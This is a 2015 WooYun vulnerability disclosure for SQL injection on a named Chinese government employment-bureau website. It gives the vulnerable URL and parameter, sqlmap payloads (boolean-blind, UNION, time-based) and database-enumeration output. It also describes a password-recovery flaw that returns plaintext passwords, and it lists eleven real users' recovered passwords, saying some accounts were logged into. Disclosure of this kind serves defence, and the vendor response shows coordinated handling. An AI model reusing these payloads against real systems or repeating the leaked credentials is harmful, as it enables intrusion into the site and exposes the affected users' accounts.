当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095829

漏洞标题:安庆就业局注入爆数据库

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-02-06 11:59

修复时间:2015-03-23 12:00

公开时间:2015-03-23 12:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

该网站存在注入SQL漏洞并且拖库。并且存在不合理设计,通过用户名和邮箱可轻易取回原密码,是原密码,不用通过解密。导致继续社工下去.....亲自试过部分账号能登陆

详细说明:

http://www.aqjyw.gov.cn/include/content.php?id=552


该网站存在注入SQL漏洞并且拖库。并且存在不合理设计,通过用户名和邮箱可轻易取回原密码,是原密码,不用通过解密。导致继续社工下去.....亲自试过部分账号能登陆

漏洞证明:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=552 AND 5110=5110
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: id=-1102 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766
a71,0x5942784e4146766e6b44,0x717a787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=552 AND SLEEP(5)
---
[22:14:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[22:14:50] [INFO] fetching database names
[22:14:50] [INFO] the SQL query used returns 2 entries
[22:14:50] [INFO] resumed: information_schema
[22:14:50] [INFO] resumed: aqjywdb


以下是部分数据:

123.jpg


使用该网址可找回原密码:
http://www.aqjyw.gov.cn/account.php

455.jpg


778.jpg


就上述账号,可以登陆163邮箱。
爆密码证明:
还是利用上面部分数据
通过Burpsuite Intruder模块的Pitchfork方式一对一(用户名跟邮箱)
可以爆出密码:

码是:12345678
码是:817521cz
码是:5201314WQ
码是:19690114
码是:12345678
码是:19887209HR
码是:yuchao1136
码是:19600728
码是:13866052557
码是:aq5314283ok
码是:aqjkxd951200


修复方案:

本人仅测试数据真实性,提交漏洞后已删除数据。
希望网站管理员能马上修复sql注入漏洞,但由于找回密码功能存在逻辑错误。建议替换掉该套程序。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-11 08:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置.

最新状态:

暂无